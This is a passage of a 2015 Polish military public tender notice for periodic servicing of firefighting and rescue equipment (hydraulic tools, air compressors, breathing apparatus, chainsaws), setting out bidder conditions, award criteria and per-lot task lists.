5.Realizacja usług odbywać się będzie  w miejscowości Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog) i/lub miejscowści Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja (w zależności od zadania).
6.Wykonawca realizując usługi na terenie CSLog i JW 4224 zobowiązany jest do przestrzegania przepisów dotyczących ochrony środowiska, przepisów przeciwpożarowych i porządkowych obowiązujących na terenie CSLog i JW 4224.
7.Po zrealizowaniu usługi Wykonawca winien uprzątnąć miejsce, w którym wykonywał czynności związane z realizacją usługi oraz odebrać zużyte części i płyny eksploatacyjne i zabrudzone czyściwa (o ile wystąpią dla danego zadania).
8.Wykonawca udzieli gwarancji na wymienione elementy, materiały oraz wykonaną usługę:dla zadania nr: 1, 2, 7, 8 , 9, 10, 11, 13, 14, 15, 16, 17 - na okres 12 miesięcy, dla zadania nr: 3, 4, 5, 6, 12 - na okres 6 miesięcy po pierwszym przeglądzie 
i 6 miesięcy po drugim przeglądzie od dnia protokolarnego przyjęcia sprzętu po wykonanej usłudze.
9.Okres ważności przeglądu w danym zadaniu musi być zgodny z wymaganiami producenta sprzętu i obowiązującymi w tym zakresie normami (data przeglądu zostanie odnotowana w książce serwisowej sprzętu).
10.Szczegółowy opis warunków realizacji przedmiotu zamówienia określają Ogólne Warunki Umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców składających ofertę wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 2 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 4 PZP. Ocena spełnienia powyższego warunku nastąpi na podstawie treści przedstawionego oświadczenia jak powyżej, na zasadzie spełnia lub nie spełnia wymaganego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy - art. 36a ustawy PZP.
W przypadku gdy Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy winien w ofercie wskazać części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. 
lub / i
Zamawiający żąda podania przez Wykonawcę nazw (firm) podwykonawców, 
w sytuacji gdy Wykonawca powołuje się na zasoby tych podwykonawców  na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1.
W przypadku, gdy Wykonawca nie wskaże w ofercie części zamówienia, której wykonanie powierzy podwykonawcom Zamawiający uzna, że całość zamówienia wykona samodzielnie.Wykonawca wraz z ofertą winien przedłożyć:Formularz ofertowy;Oświadczenie o spełnieniu warunków udziału;Oświadczenie o braku podstaw do  wykluczenia z postępowania;Wykaz części zamówienia, które Wykonawca zamierza powierzyć do realizacji   podwykonawcy;Informacja o Wykonawcy;Oświadczenie o przynależności / bądź nie przynależności do grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 Ustawy przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w następującym zakresie:
1)udziału podwykonawcy na etapie realizacji umowy w sytuacji, gdy Wykonawca nie przewidział jego udziału w treści oferty lub zmiany podwykonawcy na innego 
- w przypadku, kiedy Wykonawca określi go co do tożsamości w ofercie a nowy podwykonawca spełni wymagania dla fachowego wykonania powierzanych mu czynności lub części zamówienia zgodnie z umową (np. oświadczenie Wykonawcy, podwykonawcy);
2)zmiany zakresu podwykonawstwa;
3)zmiany podwykonawcy na innego lub rezygnacji z podwykonawcy uczestniczącego w realizacji umowy w sytuacji gdy wykonawca na etapie składania ofert wykazał podwykonawcę jako podmiot, na którego zasoby wykonawca powołał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. Wykonawca w tej sytuacji będzie zobowiązany udowodnić  Zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagane 
w trakcie postępowania o udzielenie zamówienia;
4)terminu realizacji, w przypadku zaistnienia po stronie Zamawiającego okoliczności uniemożliwiających wykonanie usługi,  w terminach określonych w Rozdziale III ust. 3 SIWZ, nie powstałych z winy Zamawiającego. 
Zmiany jak powyżej  wymagają zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.13wog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> z kasy JW 4503 ul. Czwartaków 1,86-300 Grudziądz:4zł, na wniosek Wykonawcy -wysyłka: 8,63 zł lub bezpłatnie z www.13wog.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2015 godzina 09:30, miejsce: kancelaria JW 4503 ul.Czwartaków 1 86-300 Grudziądz (pom.7 bud. 1)-osobiście lub przesyłka, wykonawca uwzględnia czas niezbędny na dostarczenie oferty bezpośrednio do kancelarii.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kopertę należy opisać hasłem: OFERTA PRZETARGOWA: PRZEGLĄDY SPRZĘTU POŻARNICZEGO - sprawa nr 4/2015  nie otwierać do dnia 04.03.2015 r. godz. 10.00. Na kopercie umieścić należy w postaci pieczęci firmowej lub odręcznego napisu nazwę Wykonawcy i jego adres zgodnie z danymi rejestrowymi (ewidencyjnymi). Konsekwencje złożenia oferty niezgodnie z opisem (np. potraktowanie oferty jako zwykłej korespondencji i niedostarczenie jej na miejsce składania ofert w terminie ) ponosi Wykonawca. Wykonawca dla zachowania terminu składania ofert winien uwzględnić czas niezbędny na wystawienie przez osobę pełniącą służbę w biurze przepustek, przepustki upoważniającej do wejścia do kancelarii Zamawiającego oraz czas niezbędny na przejście do kancelarii i złożenie oferty.OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE OFERTY, WRAZ Z PODANIEM ZNACZENIA TYCH KRYTERIÓW I SPOSOBU OCENY OFERT (art. 36 ust. 1 pkt 13 Ustawy)
1.Zamawiający dokona wyboru najkorzystniejszej oferty z ofert ważnych przy zastosowaniu kryterium: 
1)cena oferty - 95%
Cn = C of.n./Cof.b. x  95 pkt 
gdzie: 
Cn - liczba punktów za kryterium cena
Cof.n. - cena oferty najniższej
Cof.b. - cena oferty badanej

Oferta z najniższą ceną otrzymuje 95 punktów, każda następna będzie przeliczana w  stosunku  do  oferty  z  ceną  najniższą według wzoru jak powyżej.
           
2)czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU -  5%:

a)Wykonawca, który zaoferuje realizację przedmiotu zamówienia w terminie 7 dni roboczych od dnia zawiadomienia przez Zamawiającego o fakcie naprawienia sprzętu - otrzymuje 0 pkt za przedmiotowe kryterium.

b)Wykonawca, który zaoferuje realizację przedmiotu zamówienia w terminie 6 dni roboczych od dnia zawiadomienia przez Zamawiającego o fakcie naprawienia sprzętu - otrzymuje 1 pkt za przedmiotowe kryterium.

c)Wykonawca, który zaoferuje realizację przedmiotu zamówienia w terminie 5 dni roboczych od dnia zawiadomienia przez Zamawiającego o fakcie naprawienia sprzętu - otrzymuje 1,5 pkt za przedmiotowe kryterium.

d)Wykonawca, który zaoferuje realizację przedmiotu zamówienia w terminie 4 dni roboczych od dnia zawiadomienia przez Zamawiającego o fakcie naprawienia sprzętu - otrzymuje 2 pkt za przedmiotowe kryterium.

e)Wykonawca, który zaoferuje realizację przedmiotu zamówienia w terminie 3 dni roboczych od dnia zawiadomienia przez Zamawiającego o fakcie naprawienia sprzętu - otrzymuje 3 pkt za przedmiotowe kryterium.

f)Wykonawca, który zaoferuje realizację przedmiotu zamówienia w terminie 2 dni roboczych od dnia zawiadomienia przez Zamawiającego o fakcie naprawienia sprzętu - otrzymuje 4 pkt za przedmiotowe kryterium.

g)Wykonawca, który zaoferuje realizację przedmiotu zamówienia w terminie 1 dnia roboczych od dnia zawiadomienia przez Zamawiającego o fakcie naprawienia sprzętu - otrzymuje 5 pkt za przedmiotowe kryterium.


Wykonawca może maksymalnie otrzymać 5 pkt za przedmiotowe kryterium


Brak wskazania przez Wykonawcę w treści oferty i/lub w Formularzu ofertowym  czasu realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU (tj. W przypadku, gdy sprzęt jest niesprawny i wymaga naprawy co uniemożliwia dokonanie przeglądu zgodnie z opisem przedmiotu zamówienia, Wykonawca zobowiązany jest do przystąpienia do czynności wymaganych w § 2 ust 3 OWU w terminie 7 dni roboczych (chyba, że Wykonawca oświadczy w ofercie inaczej) od momentu zawiadomienia przez Zamawiającego 
o fakcie naprawienia sprzętu.) terminu, bądź zaoferowanie czasu odrębnego od wskazanego powyżej spowoduje nie przyznanie punktów Wykonawcy w przedmiotowym kryterium oraz uznanie przez Zamawiającego, iż Wykonawca wykona zamówienie w terminie 7 dni roboczych od dnia zawiadomienia przez Zamawiającego o fakcie naprawienia sprzętu.

3)  punkty przyznane za obydwa kryteria zostaną zsumowane, a oferta spełniająca warunki oraz posiadająca największą liczbą punktów zostanie uznana za najkorzystniejszą. 
                  
2.Jeżeli w niniejszym postępowaniu nie będzie można dokonać wyboru oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną (art. 91 ust. 4 Ustawy)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1:  Przegląd okresowy narzędzi hydraulicznych Holmatro - DPU 62P25, 2060 PU Core, DPU 61 P20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)ZADANIE NR 1:  Przegląd okresowy narzędzi hydraulicznych Holmatro - DPU 62P25, 2060 PU Core, DPU 61 P20
Nazwa czynności:		
1)wymiana filtrów powietrza
2)wymiana świec zapłonowych
3)sprawdzenie układu rozruchu  silnika               
4)sprawdzenie parametrów pracy silnika
5)sprawdzenie szczelności zwijadeł
6)sprawdzenie szczelności przyłączy kości zwijadeł
7)sprawdzenie szczelności króćca zaworu
8)sprawdzenie szczelności kości przyłącza
9)sprawdzenie szczelności szybkozłącza pompy
10)sprawdzenie szczelności szybkozłączy narzędzi
11)sprawdzenie szczelności i działania zaworu bezpieczeństwa
12)sprawdzenie ciśnienia maksymalnego
13)sprawdzenie sił nacisku i rozwarcia narzędzi
14)wymiana oleju hydraulicznego	
Ilość czynności w roku: raz w roku - wrzesień	
Ilość zestawów ogółem: 3 zestawy
ZESTAW: Holmatro - DPU 62P25 - 1 zestaw MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja
ZESTAW: 2060 PU Core - 1 zestaw MIEJSCE WYKONANIA USŁUGI:	Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
ZESTAW: DPU 61 P20 - 1 zestaw MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2: Przegląd okresowy pompy Lukas P-620 SG i narzędzi hydraulicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2: Przegląd okresowy pompy Lukas P-620 SG i narzędzi hydraulicznych
Nazwa czynności:		
1)wymiana filtrów powietrza
2)wymiana świec zapłonowych 
3)sprawdzenie układu rozruchu silnika                    
4)sprawdzenie parametrów pracy silnika
5)sprawdzenie szczelności zwijadeł
6)sprawdzenie szczelności przyłączy kości zwijadeł
7)sprawdzenie szczelności króćca zaworu
8)sprawdzenie szczelności kości przyłącza
9)sprawdzenie szczelności szybkozłącza pompy
10)sprawdzenie szczelności szybkozłączy narzędzi
11)sprawdzenie szczelności zaworu bezpieczeństwa
12)sprawdzenie ciśnienia maksymalnego
13)sprawdzenie sił nacisku i rozwarcia narzędzi
14)wymiana oleju hydraulicznego	
Ilość czynności w roku: raz w roku - lipiec	
Ilość zestawów ogółem:1 zestaw
ZESTAW: pompa Lukas P-620 SG i narzędzi hydraulicznych - 1 zestaw MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3:Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych COLTRI MCH-6 ETC, CTC- 100 GX 160.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 3: Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych COLTRI MCH-6 ETC, CTC- 100 GX 160
Nazwa czynności:
1)wymiana filtra oczyszczania powietrza 
2)wymiana filtra wstępnego powietrza 
3)wymiana oleju 
4)sprawdzenie działania zaworu bezpieczeństwa
5)sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021 
6)dokonanie przeglądu  poprawności działania przyrządów pomiarowych
7)wymiana paska napędowego	
Ilość czynności w roku:dwa razy w roku:maj,listopad	
Ilość sprzętu ogółem: 4 szt.

SPRZĘT:Aparaty powietrzne COLTRI MCH-6 ETC-3 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
SPRZĘT:Aparaty powietrzne CTC- 100 GX 160 -	1 szt.	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 
- Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 4: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych MSA 100 EFI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 4: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych MSA 100 EFI
Nazwa czynności:		
1)wymiana filtra oczyszczania powietrza  
2)wymiana filtra wstępnego powietrza 
3)wymiana oleju 
4)sprawdzenie działania zaworu bezpieczeństwa
5)sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021 
6)dokonanie przeglądu poprawności działania przyrządów pomiarowych 
7)wymiana paska napędowego	
Ilość czynności w roku: dwa razy w roku: maj,listopad	
Ilość sprzętu ogółem: 1 szt.

SPRZĘT:kompresor elektryczny do ładowania butli aparatów powietrznych -   MSA 100EFI - 1 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR 5: Przegląd  okresowy  kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000 - TE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 5: Przegląd  okresowy  kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000 - TE
Nazwa czynności:		
1)wymiana filtra oczyszczania powietrza
2)wymiana filtra wstępnego powietrza
3)wymiana oleju
4)sprawdzenie działania zaworu bezpieczeństwa
5)sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021 
6)dokonanie przeglądu  
7)poprawności działania  przyrządów pomiarowych  
8)wymiana paska napędowego	
Ilość czynności w roku: dwa razy w roku:maj,listopad	
Ilość sprzętu ogółem: 1 szt.

SPRZĘT:kompresor elektryczny do ładowania butli aparatów powietrznych -   Bauer Posejdon PE 3000-TE  - 1 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE NR 6:  Przegląd  okresowy  aparatów powietrznych nadciś.: FENZY AERIS, masek aparatów oraz butli kompozytowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 6:  Przegląd  okresowy  aparatów powietrznych nadciś.: FENZY AERIS, masek aparatów oraz butli kompozytowych
Nazwa czynności		
1)sprawdzenie szczelności, konserwacja ,badanie dynamiczne na sztucznym płucu, dezynfekcja, kontrola końcowa, dopuszczenie do użytku, wpis do książki paszportowej.
2)dokonanie przeglądu poprawności działania przyrządów pomiarowych
3)wymiana membram wydechowych zaworów w półmaskach
4)wymiana uszczelek pod łącznik air klik
5)wymiana przy jednym aparacie pokrętła reduktora PF nr 1609787 (1 szt.)	
Ilość czynności w roku: dwa razy w roku: maj,listopad	
Ilość sprzętu ogółem: 39 szt.
SPRZĘT:aparaty powietrzne nadciś. FENZY AERIS, maski aparatów oraz butle kompozytowe -36 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:aparaty powietrzne nadciś. FENZY AERIS, maski aparatów oraz butle kompozytowe - 3 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE NR 7:Przegląd okresowy pił spalinowych MS-290 STIHL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 7:  Przegląd okresowy pił spalinowych MS-290 STIHL
Nazwa czynności:	
1)wymiana filtra powietrza
2)wymiana świec zapłonowych
3)sprawdzenie działania układu rozruchowego silnika
4)sprawdzenie parametrów pracy silnika
5)sprawdzenie działania hamulca bezpieczeństwa
6)wymiana smoczka 
7)ostrzenie łańcucha
8)regulacja naciągu łańcucha
9)regulacja pracy silnika	
Ilość czynności w roku: raz w roku: sierpień	
Ilość sprzętu ogółem:16 szt.

Sprzęt:piły spalinowe MS-290 STIHL - 14 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:piły spalinowe MS-290 STIHL- 2 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 
- Skład Gardeja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas realizacji zamówienia w okolicznościach, o których mowa w par. 4 ust. 3 OWU - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZADANIE NR 8: Przegląd okresowy przecinarek spalinowych do stali i betonu TS-400, TS-800.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 8:  Przegląd okresowy przecinarek spalinowych do stali i betonu TS-400, TS-800
Nazwa czynności:		
1)wymiana filtra powietrza
2)wymiana świec zapłonowych
3)sprawdzenie działania układu rozruchowego silnika
4)sprawdzenie parametrów pracy silnika
5)sprawdzenie działania hamulca bezpieczeństwa
